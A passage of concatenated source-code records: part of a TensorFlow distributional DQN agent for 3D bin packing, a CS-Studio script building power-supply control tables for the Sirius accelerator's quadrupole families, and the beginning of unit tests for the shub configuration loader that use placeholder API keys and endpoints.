np.linspace(self.vmin,self.vmax,self.nsup)\n self.gamma = 0.9\n self.criterion = tf.keras.losses.CategoricalCrossentropy()\n self.dist = False\n # model\n if net == 'DNN':\n self.model = DQN_DNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n self.target_model = DQN_DNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n elif net =='CNN':\n self.model = DQN_CNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n self.target_model = DQN_CNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n elif net =='CNNDNN':\n self.model = DQN_CNNDNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n self.target_model = DQN_CNNDNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.output_size)\n # distributed q learning\n elif net == 'DDQN_DNN':\n self.model = DQN_DNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.nsup)\n self.target_model = DQN_DNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.nsup)\n elif net == 'DDQN_CNNDNN':\n self.model = DQN_CNNDNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.nsup)\n self.target_model = DQN_CNNDNN(self.state_size, self.selected_size, self.remain_size, self.loading_size, self.nsup)\n \n if net in ['DDQN_DNN', 'DDQN_CNNDNN']:\n print('distribution', net)\n self.dist = True\n \n self.optimizer = Adam(self.learning_rate)#, clipnorm=10.)\n # target model (init)\n self.update_target_model()\n self.avg_q_max, self.avg_loss = 0, 0\n self.writer = tf.summary.create_file_writer('summary/bpp')\n self.model_path = os.path.join(os.getcwd(), 'save_model', 'model_3d')\n\n def update_target_model(self):\n self.target_model.set_weights(self.model.get_weights())\n\n def get_action(self, state, loaded_mh_c, r_boxes, loading):\n if np.random.rand() <= self.epsilon:\n random_action = random.randrange(len(state))\n return random_action\n else:\n if self.dist:\n z = self.model.predict([state, loaded_mh_c, r_boxes, loading]) #(C,51)\n z_concat = np.vstack(z) #action output이 여러개 일때\n #q = np.sum(np.multiply(z_concat[:,45:], np.array(self.z)[45:]), axis=1) #(C,)\n q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1) #(C,)\n self.avg_q_max += np.amax(q)\n return np.argmax(q)\n else:\n q_values=self.model([state, loaded_mh_c, r_boxes, loading])\n armax_idx = np.where( q_values == tf.math.reduce_max(q_values))\n action_idx = armax_idx[0][0]\n return action_idx\n \n \n def append_sample(self, history, load, remain_size, load_size, reward, last, t_history, t_load, t_remain_size, t_load_size):\n self.memory.append(( history, load, remain_size, load_size, reward, last, t_history, t_load, t_remain_size, t_load_size))\n \n \n def draw_tensorboard(self, reward, fill, step, episode):\n with self.writer.as_default():\n tf.summary.scalar('Total Reward/Episode', reward, step=episode)\n tf.summary.scalar('Total Fill/Episode', fill, step=episode)\n tf.summary.scalar('Average Max Q/Episode', self.avg_q_max / float(step), step=episode)\n tf.summary.scalar('Duration/Episode', step, step=episode)\n tf.summary.scalar('Average Loss/Episode', self.avg_loss / float(step), step=episode)\n \n def train_model(self):\n \n batch = random.sample(self.memory, self.batch_size)\n \n history = np.array([sample[0] for sample in batch])# (B, 20,20,2)\n load = np.array([sample[1] for sample in batch])# (B, 20,20,1)\n remain_size = np.array([sample[2] for sample in batch]) # (B, 20,20, max_num_remain)\n load_size = np.array([sample[3] for sample in batch]) # (B, 20, 20, K)\n reward = np.array([sample[4] for sample in batch]) # (B,)\n dones = np.array([sample[5] for sample in batch]) # (B,)\n len_t_comb = [ len(sample[6]) for sample in batch ]\n t_history = np.concatenate([sample[6] for sample in batch] )\n t_load = np.concatenate([sample[7] for sample in batch])\n t_remain_size = np.concatenate([sample[8] for sample in batch] )\n t_load_size = np.concatenate([sample[9] for sample in batch] )\n \n #print(history.shape,load.shape,remain_size.shape, load_size.shape, reward.shape, dones.shape, t_history.shape, t_load.shape, t_remain_size.shape, t_load_size.shape)\n \n model_params = self.model.trainable_variables\n with tf.GradientTape() as tape:\n if self.dist:\n # 예측\n predicts = self.model([history, load, remain_size, load_size]) # B,51\n # 타겟\n z_b = []\n for i in range(0,len(t_history), self.batch_size ):\n e_idx = min( i + self.batch_size, len(t_history) )\n z = self.target_model([t_history[i:e_idx], t_load[i:e_idx], t_remain_size[i:e_idx], t_load_size[i:e_idx]]) #(C, 51)\n z_b.append(z)\n z_concat = np.vstack(z_b) #(B*c, 51)\n t_q = np.sum(np.multiply(z_concat, np.array(self.z)), axis=1) #(B*c, )\n # 가장 기댓값이 높은 action 선택\n next_actions, probs = [],[]\n for i in range(len(len_t_comb)):\n s_idx = np.sum(len_t_comb[:i]).astype('int')\n n_a = np.argmax(t_q[s_idx: s_idx + len_t_comb[i]])\n next_actions.append(n_a) #[32]\n probs.append((z_concat[s_idx: s_idx + len_t_comb[i]])[n_a])\n probs = np.stack(probs) #(B, 51)\n # target distribution\n bj = np.round((reward - self.vmin)/self.dz) #(B,)\n #지지 성분의 색인\n bj = np.clip(bj, 0, self.nsup-1).astype('int') #유효한 범위\n targets = []\n for i in range(self.batch_size):\n if dones[i]:\n target_dist = np.zeros(self.nsup)\n target_dist[bj[i]] = 1\n targets.append(target_dist)\n else:\n m = probs[i].copy() #(51,)\n j = 1\n for i in range(bj[i],1,-1):\n m[i] += np.power(self.gamma, j) * m[i-1]\n j += 1\n j = 1\n for i in range(bj[i], self.nsup-1,1):\n m[i] += np.power(self.gamma, j) * m[i+1]\n j += 1\n m /= m.sum() #(51,)\n targets.append(m)\n loss = self.criterion(targets, predicts)\n else: \n # 예측\n predicts = self.model([history, load, remain_size, load_size]) #(B, 1)\n # 타겟\n targets = []\n for i in range(self.batch_size):\n t_q = self.target_model([t_history[i], t_load[i], t_remain_size[i], t_load_size[i]]) # target q value\n t_max_q = tf.math.reduce_max(t_q)\n targets.append([(1- 0.75)*reward[i] + (1 - dones[i]) *0.75*t_max_q])\n targets=np.array(targets) #(B, 1)\n # loss 계산\n #loss = tf.reduce_mean(tf.square(targets - predicts))\n error = tf.abs(targets - predicts)\n quadratic_part = tf.clip_by_value(error, 0.0, 1.0)\n linear_part = error - quadratic_part\n loss = tf.reduce_mean(0.5 * tf.square(quadratic_part) + linear_part)\n \n self.avg_loss += loss.numpy()\n \n # update\n grads = tape.gradient(loss, model_params)\n self.optimizer.apply_gradients(zip(grads, model_params))\n \n\n\n \n \n \n","sub_path":"3DBPP/ActorCritic/box_dqn/libs/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":15555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126574524","text":"from org.csstudio.opibuilder.scriptUtil import PVUtil, WidgetUtil, DataUtil\n\ndef get_power_supply_list(family):\n if family == 'QFA':\n power_supplies = [\n \"QFA-01M2\", \"QFA-02M2\", \"QFA-03M2\", \"QFA-04M2\", \"QFA-05M2\", \n \"QFA-06M2\", \"QFA-07M2\", \"QFA-08M2\", \"QFA-09M2\", \"QFA-10M2\", \n \"QFA-11M2\", \"QFA-12M2\", \"QFA-13M2\", \"QFA-14M2\", \"QFA-15M2\", \n \"QFA-16M2\", \"QFA-17M2\", \"QFA-18M2\", \"QFA-19M2\", \"QFA-20M2\", \n ]\n \n elif family == 'QDA':\n power_supplies = [\n \"QDA-01M2\", \"QDA-02M2\", \"QDA-03M2\", \"QDA-04M2\", \"QDA-05M2\", \n \"QDA-06M2\", \"QDA-07M2\", \"QDA-08M2\", \"QDA-09M2\", \"QDA-10M2\", \n \"QDA-11M2\", \"QDA-12M2\", \"QDA-13M2\", \"QDA-14M2\", \"QDA-15M2\", \n \"QDA-16M2\", \"QDA-17M2\", \"QDA-18M2\", \"QDA-19M2\", \"QDA-20M2\", \n ]\n \n elif family == 'QF1':\n power_supplies = [\n \"QF1-01C1\", \"QF1-01C4\", \"QF1-02C1\", \"QF1-02C4\", \"QF1-03C1\", \n \"QF1-03C4\", \"QF1-04C1\", \"QF1-04C4\", \"QF1-05C1\", \"QF1-05C4\", \n \"QF1-06C1\", \"QF1-06C4\", \"QF1-07C1\", \"QF1-07C4\", \"QF1-08C1\", \n \"QF1-08C4\", \"QF1-09C1\", \"QF1-09C4\", \"QF1-10C1\", \"QF1-10C4\", \n \"QF1-11C1\", \"QF1-11C4\", \"QF1-12C1\", \"QF1-12C4\", \"QF1-13C1\", \n \"QF1-13C4\", \"QF1-14C1\", \"QF1-14C4\", \"QF1-15C1\", \"QF1-15C4\", \n \"QF1-16C1\", \"QF1-16C4\", \"QF1-17C1\", \"QF1-17C4\", \"QF1-18C1\", \n \"QF1-18C4\", \"QF1-19C1\", \"QF1-19C4\", \"QF1-20C1\", \"QF1-20C4\", \n ]\n \n elif family == 'QF2':\n power_supplies = [\n \"QF2-01C1\", \"QF2-01C4\", \"QF2-02C1\", \"QF2-02C4\", \"QF2-03C1\", \n \"QF2-03C4\", \"QF2-04C1\", \"QF2-04C4\", \"QF2-05C1\", \"QF2-05C4\", \n \"QF2-06C1\", \"QF2-06C4\", \"QF2-07C1\", \"QF2-07C4\", \"QF2-08C1\", \n \"QF2-08C4\", \"QF2-09C1\", \"QF2-09C4\", \"QF2-10C1\", \"QF2-10C4\", \n \"QF2-11C1\", \"QF2-11C4\", \"QF2-12C1\", \"QF2-12C4\", \"QF2-13C1\", \n \"QF2-13C4\", \"QF2-14C1\", \"QF2-14C4\", \"QF2-15C1\", \"QF2-15C4\", \n \"QF2-16C1\", \"QF2-16C4\", \"QF2-17C1\", \"QF2-17C4\", \"QF2-18C1\", \n \"QF2-18C4\", \"QF2-19C1\", \"QF2-19C4\", \"QF2-20C1\", \"QF2-20C4\", \n ]\n \n elif family == 'QF3':\n power_supplies = [\n \"QF3-01C2\", \"QF3-01C3\", \"QF3-02C2\", \"QF3-02C3\", \"QF3-03C2\", \n \"QF3-03C3\", \"QF3-04C2\", \"QF3-04C3\", \"QF3-05C2\", \"QF3-05C3\", \n \"QF3-06C2\", \"QF3-06C3\", \"QF3-07C2\", \"QF3-07C3\", \"QF3-08C2\", \n \"QF3-08C3\", \"QF3-09C2\", \"QF3-09C3\", \"QF3-10C2\", \"QF3-10C3\", \n \"QF3-11C2\", \"QF3-11C3\", \"QF3-12C2\", \"QF3-12C3\", \"QF3-13C2\", \n \"QF3-13C3\", \"QF3-14C2\", \"QF3-14C3\", \"QF3-15C2\", \"QF3-15C3\", \n \"QF3-16C2\", \"QF3-16C3\", \"QF3-17C2\", \"QF3-17C3\", \"QF3-18C2\", \n \"QF3-18C3\", \"QF3-19C2\", \"QF3-19C3\", \"QF3-20C2\", \"QF3-20C3\", \n ]\n \n elif family == 'QF4':\n power_supplies = [\n \"QF4-01C2\", \"QF4-01C3\", \"QF4-02C2\", \"QF4-02C3\", \"QF4-03C2\", \n \"QF4-03C3\", \"QF4-04C2\", \"QF4-04C3\", \"QF4-05C2\", \"QF4-05C3\", \n \"QF4-06C2\", \"QF4-06C3\", \"QF4-07C2\", \"QF4-07C3\", \"QF4-08C2\", \n \"QF4-08C3\", \"QF4-09C2\", \"QF4-09C3\", \"QF4-10C2\", \"QF4-10C3\", \n \"QF4-11C2\", \"QF4-11C3\", \"QF4-12C2\", \"QF4-12C3\", \"QF4-13C2\", \n \"QF4-13C3\", \"QF4-14C2\", \"QF4-14C3\", \"QF4-15C2\", \"QF4-15C3\", \n \"QF4-16C2\", \"QF4-16C3\", \"QF4-17C2\", \"QF4-17C3\", \"QF4-18C2\", \n \"QF4-18C3\", \"QF4-19C2\", \"QF4-19C3\", \"QF4-20C2\", \"QF4-20C3\", \n ]\n \n elif family == 'QDB1':\n power_supplies = [\n \"QDB1-01M1\", \"QDB1-02M1\", \"QDB1-03M1\", \"QDB1-04M1\", \"QDB1-05M1\", \n \"QDB1-06M1\", \"QDB1-07M1\", \"QDB1-08M1\", \"QDB1-09M1\", \"QDB1-10M1\", \n \"QDB1-11M1\", \"QDB1-12M1\", \"QDB1-13M1\", \"QDB1-14M1\", \"QDB1-15M1\", \n \"QDB1-16M1\", \"QDB1-17M1\", \"QDB1-18M1\", \"QDB1-19M1\", \"QDB1-20M1\", \n ]\n \n elif family == 'QFB':\n power_supplies = [\n \"QFB-01M1\", \"QFB-02M1\", \"QFB-03M1\", \"QFB-04M1\", \"QFB-05M1\", \n \"QFB-06M1\", \"QFB-07M1\", \"QFB-08M1\", \"QFB-09M1\", \"QFB-10M1\", \n \"QFB-11M1\", \"QFB-12M1\", \"QFB-13M1\", \"QFB-14M1\", \"QFB-15M1\", \n \"QFB-16M1\", \"QFB-17M1\", \"QFB-18M1\", \"QFB-19M1\", \"QFB-20M1\", \n ]\n \n elif family == 'QDB2':\n power_supplies = [\n \"QDB2-01M1\", \"QDB2-02M1\", \"QDB2-03M1\", \"QDB2-04M1\", \"QDB2-05M1\", \n \"QDB2-06M1\", \"QDB2-07M1\", \"QDB2-08M1\", \"QDB2-09M1\", \"QDB2-10M1\", \n \"QDB2-11M1\", \"QDB2-12M1\", \"QDB2-13M1\", \"QDB2-14M1\", \"QDB2-15M1\", \n \"QDB2-16M1\", \"QDB2-17M1\", \"QDB2-18M1\", \"QDB2-19M1\", \"QDB2-20M1\", \n ]\n else:\n power_supplies = None\n \n return power_supplies\n\n\ndef add_header(table, header_opi):\n linkingContainer = WidgetUtil.createWidgetModel(\"org.csstudio.opibuilder.widgets.linkingContainer\") \n linkingContainer.setPropertyValue(\"opi_file\", header_opi)\n linkingContainer.setPropertyValue(\"resize_behaviour\", 1)\n linkingContainer.setPropertyValue(\"border_style\", 0)\n table.addChildToBottom(linkingContainer)\n\n\ndef add_line(table, line_opi, power_supply):\n linkingContainer = WidgetUtil.createWidgetModel(\"org.csstudio.opibuilder.widgets.linkingContainer\") \n linkingContainer.setPropertyValue(\"opi_file\", line_opi)\n linkingContainer.setPropertyValue(\"resize_behaviour\", 1)\n linkingContainer.setPropertyValue(\"border_style\", 0)\n table.addChildToBottom(linkingContainer)\n \n children = linkingContainer.getChildren()\n for w in children:\n if w.getPropertyValue(\"widget_type\") == \"Action Button\":\n button = w\n elif w.getPropertyValue(\"widget_type\") == \"Spinner\":\n spinner = w\n elif w.getPropertyValue(\"widget_type\") == \"Text Update\":\n text_update = w\n elif w.getPropertyValue(\"widget_type\") == \"Grouping Container\":\n container = w\n led = container.getChildren()[0] \n\n setpoint = subsystem + power_supply.upper() + '-SP'\n readback = subsystem + power_supply.upper() + '-RB'\n \n button.setPropertyValue(\"text\", power_supply)\n spinner.setPropertyValue(\"pv_name\", setpoint)\n text_update.setPropertyValue(\"pv_name\", readback)\n led.setPropertyValue(\"pv_name\", '$(power_supply_status)')\n \n macro_inputs = DataUtil.createMacrosInput(True)\n macro_inputs.put(\"power_supply\", power_supply)\n macro_inputs.put(\"power_supply_sp\", setpoint)\n macro_inputs.put(\"power_supply_rb\", readback)\n macro_inputs.put(\"power_supply_start\", 'sim://const(\"quadrupole\")')\n linkingContainer.setPropertyValue(\"macros\", macro_inputs)\n \n\nsubsystem = \"SIPS-\"\nfamily = PVUtil.getString(pvs[0]).upper()\npower_supplies = get_power_supply_list(family)\nheader_opi = \"table/table_header.opi\"\nline_opi = \"table/table_line.opi\"\n\ntable_container = display.getWidget(\"table_container\")\nfam_table = display.getWidget(\"fam_table\")\nshunt_table_1 = display.getWidget(\"shunt_table_1\")\nshunt_table_2 = display.getWidget(\"shunt_table_2\")\n\nfam_table.removeAllChildren()\nshunt_table_1.removeAllChildren()\nshunt_table_2.removeAllChildren()\n \nif power_supplies is None:\n table_container.setPropertyValue(\"visible\", False)\n \nelse: \n # create table for family power supply\n add_header(fam_table, header_opi)\n power_supply = family.upper() + '-FAM'\n add_line(fam_table, line_opi, power_supply)\n \n # create table for shunt power supply\n length = len(power_supplies)\n table_len = 20\n table = shunt_table_1\n add_header(table, header_opi) \n for i in range(1,length+1):\n power_supply = power_supplies[i-1]\n add_line(table, line_opi, power_supply) \n if i == table_len and length > table_len: \n table = shunt_table_2\n add_header(table, header_opi) \n\n fam_table.performAutosize() \n shunt_table_1.performAutosize()\n shunt_table_2.performAutosize() \n table_container.setPropertyValue(\"visible\", True)\n","sub_path":"sirius/opi/si_power_supplies/table/write_quad_table.py","file_name":"write_quad_table.py","file_ext":"py","file_size_in_byte":8111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"21290","text":"import os\nimport shutil\nimport StringIO\nimport tempfile\nimport textwrap\nimport unittest\nimport ruamel.yaml as yaml\n\nimport mock\n\nfrom click.testing import CliRunner\n\nfrom shub.config import (get_target, get_version, load_shub_config, ShubConfig,\n update_yaml_dict)\nfrom shub.exceptions import (BadParameterException, BadConfigException,\n ConfigParseException, MissingAuthException,\n NotFoundException)\n\n\nVALID_YAML_CFG = \"\"\"\n projects:\n shproj: 123\n externalproj: external/123\n notmeproj: otheruser/123\n invalid: 50a\n invalid2: 123/external\n endpoints:\n external: ext_endpoint\n apikeys:\n default: key\n otheruser: otherkey\n\"\"\"\n\n\nclass ShubConfigTest(unittest.TestCase):\n\n def _get_conf_with_yml(self, yml):\n conf = ShubConfig()\n conf.load(StringIO.StringIO(textwrap.dedent(yml)))\n return conf\n\n def setUp(self):\n self.conf = self._get_conf_with_yml(VALID_YAML_CFG)\n\n def test_init_sets_default(self):\n conf = ShubConfig()\n self.assertIn('default', conf.endpoints)\n self.assertEqual(conf.version, 'AUTO')\n\n def test_load(self):\n projects = {\n 'shproj': 123,\n 'externalproj': 'external/123',\n 'notmeproj': 'otheruser/123',\n 'invalid': '50a',\n 'invalid2': '123/external',\n }\n self.assertEqual(projects, self.conf.projects)\n endpoints = {'external': 'ext_endpoint'}\n self.assertDictContainsSubset(endpoints, self.conf.endpoints)\n apikeys = {'default': 'key', 'otheruser': 'otherkey'}\n self.assertEqual(apikeys, self.conf.apikeys)\n\n def test_load_partial(self):\n yml = \"\"\"\n endpoints:\n external: ext_endpoint\n extra:\n not related to ShubConfig\n \"\"\"\n conf = self._get_conf_with_yml(yml)\n endpoints = {'external': 'ext_endpoint'}\n self.assertDictContainsSubset(endpoints, conf.endpoints)\n self.assertEqual(conf.projects, {})\n self.assertEqual(conf.apikeys, {})\n # Assert no exception raised on empty file\n conf = self._get_conf_with_yml(\"\")\n\n def test_load_malformed(self):\n # Invalid YAML\n yml = \"\"\"\n endpoints\n external: ext_endpoint\n apikeys:\n default: key\n \"\"\"\n with self.assertRaises(ConfigParseException):\n self._get_conf_with_yml(yml)\n # Valid YAML but not dictionary-like\n yml = \"\"\"\n endpoints\n external: ext_endpoint\n \"\"\"\n with self.assertRaises(ConfigParseException):\n self._get_conf_with_yml(yml)\n\n def test_load_file(self):\n tmpdir = tempfile.mkdtemp()\n tmpfilepath = os.path.join(tmpdir, 'scrapinghub.yml')\n with open(tmpfilepath, 'w') as f:\n f.write(textwrap.dedent(\n \"\"\"\n apikeys:\n external: ext_endpoint\n \"\"\"\n ))\n conf = ShubConfig()\n conf.load_file(tmpfilepath)\n shutil.rmtree(tmpdir)\n self.assertEqual({'external': 'ext_endpoint'}, conf.apikeys)\n\n def test_load_scrapycfg(self):\n tmpdir = tempfile.mkdtemp()\n tmpfilepath = os.path.join(tmpdir, 'scrapy.cfg')\n\n def _get_conf(scrapycfg_default_target):\n with open(tmpfilepath, 'w') as f:\n f.write(textwrap.dedent(scrapycfg_default_target))\n f.write(textwrap.dedent(\n \"\"\"\n [deploy:prod]\n project = 222\n\n [deploy:otheruser]\n project = 333\n username = otherkey\n\n [deploy:otherurl]\n project = 444\n url = http://dash.scrapinghub.com/api/scrapyd/\n\n [deploy:external]\n project = 555\n url = external_endpoint\n username = externalkey\n \"\"\"\n ))\n conf = ShubConfig()\n conf.load_scrapycfg([tmpfilepath])\n return conf\n\n expected_projects = {\n 'prod': '222',\n 'otheruser': 'otheruser/333',\n 'otherurl': 'otherurl/444',\n 'external': 'external/555',\n }\n expected_endpoints = {\n 'default': ShubConfig.DEFAULT_ENDPOINT,\n 'external': 'external_endpoint',\n 'otherurl': 'http://dash.scrapinghub.com/api/'\n }\n expected_apikeys = {\n 'otheruser': 'otherkey',\n 'external': 'externalkey',\n }\n\n # Default with project\n conf = _get_conf(\n \"\"\"\n [deploy]\n project = 111\n \"\"\"\n )\n expected_projects['default'] = '111'\n self.assertEqual(conf.projects, expected_projects)\n self.assertEqual(conf.endpoints, expected_endpoints)\n self.assertEqual(conf.apikeys, expected_apikeys)\n\n # Default with URL\n conf = _get_conf(\n \"\"\"\n [deploy]\n url = http://default_url\n \"\"\"\n )\n del expected_projects['default']\n expected_endpoints['default'] = 'http://default_url'\n self.assertEqual(conf.projects, expected_projects)\n self.assertEqual(conf.endpoints, expected_endpoints)\n self.assertEqual(conf.apikeys, expected_apikeys)\n\n # Default with key\n conf = _get_conf(\n \"\"\"\n [deploy]\n username = key\n \"\"\"\n )\n expected_endpoints['default'] = ShubConfig.DEFAULT_ENDPOINT\n expected_apikeys['default'] = 'key'\n expected_apikeys['otherurl'] = 'key'\n self.assertEqual(conf.projects, expected_projects)\n self.assertEqual(conf.endpoints, expected_endpoints)\n self.assertEqual(conf.apikeys, expected_apikeys)\n\n shutil.rmtree(tmpdir)\n\n def test_save(self):\n tmpdir = tempfile.mkdtemp()\n tmpfilepath = os.path.join(tmpdir, 'saved_conf.yml')\n self.conf.save(tmpfilepath)\n with open(tmpfilepath, 'r') as f:\n self.assertEqual(yaml.load(f), yaml.load(VALID_YAML_CFG))\n shutil.rmtree(tmpdir)\n\n def test_get_target(self):\n with self.assertRaises(MissingAuthException):\n self.conf.get_target('externalproj')\n self.assertEqual(\n self.conf.get_target('externalproj', auth_required=False),\n (123, 'ext_endpoint', None)\n )\n self.assertEqual(\n self.conf.get_target('shproj', auth_required=True),\n self.conf.get_target('shproj', auth_required=False),\n )\n\n def test_get_undefined(self):\n self.assertEqual(\n self.conf.get_target('99'),\n (99, self.conf.endpoints['default'], 'key'),\n )\n self.assertEqual(\n self.conf.get_target('external/99', auth_required=False),\n (99, 'ext_endpoint', None),\n )\n\n def test_get_invalid(self):\n # Missing target and no default defined\n with self.assertRaises(BadParameterException):\n self.conf.get_target('default')\n # Bad project ID on command line\n with self.assertRaises(BadParameterException):\n self.conf.get_target('99a')\n # Bad project ID in scrapinghub.yml\n with self.assertRaises(BadConfigException):\n self.conf.get_target('invalid')\n with self.assertRaises(BadConfigException):\n self.conf.get_target('invalid2')\n\n def test_get_project_id(self):\n self.assertEqual(self.conf.get_project_id('shproj'), 123)\n self.assertEqual(self.conf.get_project_id('externalproj'), 123)\n self.assertEqual(self.conf.get_project_id('notmeproj'), 123)\n\n def test_get_endpoint(self):\n self.assertEqual(\n self.conf.get_endpoint('shproj'),\n ShubConfig.DEFAULT_ENDPOINT,\n )\n self.assertEqual(\n self.conf.get_endpoint('externalproj'),\n 'ext_endpoint',\n )\n self.assertEqual(\n self.conf.get_endpoint('notmeproj'),\n ShubConfig.DEFAULT_ENDPOINT,\n )\n with self.assertRaises(NotFoundException):\n self.conf.get_endpoint('nonexisting_ep/33')\n\n def test_get_apikey(self):\n self.assertEqual(self.conf.get_apikey('shproj'), 'key')\n self.assertEqual(self.conf.get_apikey('notmeproj'), 'otherkey')\n with self.assertRaises(MissingAuthException):\n self.conf.get_apikey('externalproj', required=True)\n self.assertEqual(\n self.conf.get_apikey('externalproj', required=False),\n None,\n )\n # API keys should always be strings, even if they contain only digits\n self.conf.apikeys['default'] = 123\n self.assertEqual(self.conf.get_apikey('shproj'), '123')\n\n @mock.patch('shub.config.pwd_version', return_value='ver_AUTO')\n @mock.patch('shub.config.pwd_git_version', return_value='ver_GIT')\n @mock.patch('shub.config.pwd_hg_version', return_value='ver_HG')\n def test_get_version(self, mock_hg, mock_git, mock_ver):\n def _assert_version(version, expected):\n self.conf.version = version\n self.assertEqual(self.conf.get_version(), expected)\n _assert_version('GIT', 'ver_GIT')\n _assert_version('HG', 'ver_HG')\n _assert_version('somestring', 'somestring')\n _assert_version('', 'ver_AUTO')\n _assert_version('AUTO', 'ver_AUTO')\n\n\nLOCAL_SCRAPINGHUB_YML = \"\"\"\n projects:\n localextproj: external/123\n endpoints:\n external: local_ext_endpoint\n apikeys:\n external: key_ext\n\"\"\"\n\nGLOBAL_SCRAPY_CFG = textwrap.dedent(\"\"\"\n [deploy]\n url = dotsc_endpoint\n username = dotsc_key\n\n [deploy:ext2]\n url = ext2_endpoint\n project = 333\n username = ext2_key\n\"\"\")\n\nNETRC = 'machine scrapinghub.com login netrc_key password \"\"'\n\n\nclass LoadShubConfigTest(unittest.TestCase):\n\n def setUp(self):\n self.tmpdir = tempfile.mkdtemp()\n self.globalpath = os.path.join(self.tmpdir, '.scrapinghub.yml')\n self.localpath = os.path.join(self.tmpdir, 'scrapinghub.yml')\n self.globalscrapycfgpath = os.path.join(self.tmpdir, '.scrapy.cfg')\n self.localscrapycfgpath = os.path.join(self.tmpdir, 'scrapy.cfg')\n self.netrcpath = os.path.join(self.tmpdir, '.netrc')\n with open(self.globalpath, 'w') as f:\n f.write(VALID_YAML_CFG)\n with open(self.localpath, 'w') as f:\n f.write(LOCAL_SCRAPINGHUB_YML)\n with open(self.globalscrapycfgpath, 'w') as f:\n f.write(GLOBAL_SCRAPY_CFG)\n with open(self.netrcpath, 'w') as f:\n f.write(NETRC)\n self._old_dir = os.getcwd()\n os.chdir(self.tmpdir)\n\n patcher_gsyp = mock.patch('shub.config.GLOBAL_SCRAPINGHUB_YML_PATH',\n new=self.globalpath)\n patcher_nrcp = mock.patch('shub.config.NETRC_PATH', new=self.netrcpath)\n patcher_gs = mock.patch('shub.config.get_sources',\n return_value=[self.globalscrapycfgpath])\n self.addCleanup(patcher_gsyp.stop)\n self.addCleanup(patcher_nrcp.stop)\n self.addCleanup(patcher_gs.stop)\n patcher_gsyp.start()\n patcher_nrcp.start()\n patcher_gs.start()\n\n def tearDown(self):\n os.chdir(self._old_dir)\n shutil.rmtree(self.tmpdir)\n\n def test_scrapinghub_ymls_read(self):\n conf = load_shub_config()\n self.assertEqual(conf.get_apikey('shproj'), 'key')\n self.assertEqual(\n conf.get_endpoint('externalproj'),\n 'local_ext_endpoint',\n )\n self.assertEqual(conf.get_apikey('externalproj'), 'key_ext')\n with self.assertRaises(BadParameterException):\n conf.get_project_id('ext2')\n\n def test_local_scrapinghub_yml_in_parent_dir(self):\n subsubdir = os.path.join(self.tmpdir, 'sub/sub')\n os.makedirs(subsubdir)\n os.chdir(subsubdir)\n conf = load_shub_config()\n self.assertEqual(conf.get_apikey('externalproj'), 'key_ext')\n\n def test_no_local_scrapinghub_yml(self):\n os.remove(self.localpath)\n conf = load_shub_config()\n self.assertEqual(conf.get_apikey('shproj'), 'key')\n with self.assertRaises(BadParameterException):\n conf.get_apikey('localextproj')\n\n def test_no_global_scrapinghub_yml(self):\n os.remove(self.globalpath)\n conf = load_shub_config()\n with self.assertRaises(BadParameterException):\n conf.get_apikey('shproj')\n self.assertEqual(conf.get_apikey('localextproj'), 'key_ext')\n\n def test_envvar_precedence(self):\n _old_environ = dict(os.environ)\n os.environ['SHUB_APIKEY'] = 'key_env'\n conf = load_shub_config()\n self.assertEqual(conf.get_apikey('shproj'), 'key_env')\n os.environ.clear()\n os.environ.update(_old_environ)\n\n def test_autocreate_empty_global_scrapinghub_yml(self):\n os.remove(self.globalpath)\n os.remove(self.globalscrapycfgpath)\n os.remove(self.netrcpath)\n load_shub_config()\n self.assertTrue(os.path.isfile(self.globalpath))\n with open(self.globalpath, 'r') as f:\n self.assertEqual(f.read(), \"\")\n\n def test_automigrate_to_global_scrapinghub_yml(self):\n def _check_conf():\n conf = load_shub_config()\n self.assertEqual(\n conf.get_target('123'),\n (123, 'dotsc_endpoint', 'netrc_key'),\n )\n self.assertEqual(conf.projects['ext2'], 'ext2/333')\n self.assertEqual(\n conf.get_target('ext2'),\n (333, 'ext2_endpoint', 'ext2_key'),\n )\n os.remove(self.globalpath)\n _check_conf()\n self.assertTrue(os.path.isfile(self.globalpath))\n os.remove(self.netrcpath)\n os.remove('.scrapy.cfg')\n _check_conf()\n\n def test_automigrate_project_scrapy_cfg(self):\n def _check_conf():\n conf = load_shub_config()\n self.assertEqual(\n conf.get_target('default'),\n (222, 'scrapycfg_endpoint/', 'key'),\n )\n self.assertEqual(\n conf.get_target('ext2'),\n (333, 'ext2_endpoint/', 'ext2_key'),\n )\n self.assertEqual(\n conf.get_target('ext3'),\n (333, 'scrapycfg_endpoint/', 'key'),\n )\n self.assertEqual(\n conf.get_target('ext4'),\n (444, 'scrapycfg_endpoint/', 'ext4_key'),\n )\n self.assertEqual(conf.get_version(), 'ext2_ver')\n scrapycfg = \"\"\"\n [deploy]\n project = 222\n url = scrapycfg_endpoint/scrapyd/\n\n [deploy:ext2]\n url = ext2_endpoint/scrapyd/\n project = 333\n username = ext2_key\n version = ext2_ver\n\n [deploy:ext3]\n project = 333\n\n [deploy:ext4]\n project = 444\n username = ext4_key\n \"\"\"\n with open(self.localscrapycfgpath, 'w') as f:\n f.write(textwrap.dedent(scrapycfg))\n os.mkdir('project')\n os.chdir('project')\n conf = load_shub_config()\n with self.assertRaises(BadParameterException):\n conf.get_target('ext2')\n os.remove(self.localpath)\n # Loaded from scrapy.cfg\n _check_conf()\n # Same config should now be loaded from scrapinghub.yml\n self.assertTrue(os.path.isfile(self.localpath))\n _check_conf()\n\n\nclass ConfigHelpersTest(unittest.TestCase):\n\n def test_update_yaml_dict(self):\n YAML_BEFORE = textwrap.dedent(\"\"\"\\\n z_first:\n unrelated: dict\n a_second:\n key1: val1\n # some comment\n key2: val2\n \"\"\")\n YAML_EXPECTED = textwrap.dedent(\"\"\"\\\n z_first:\n unrelated: dict\n a_second:\n key1: newval1\n # some comment\n key2: val2\n 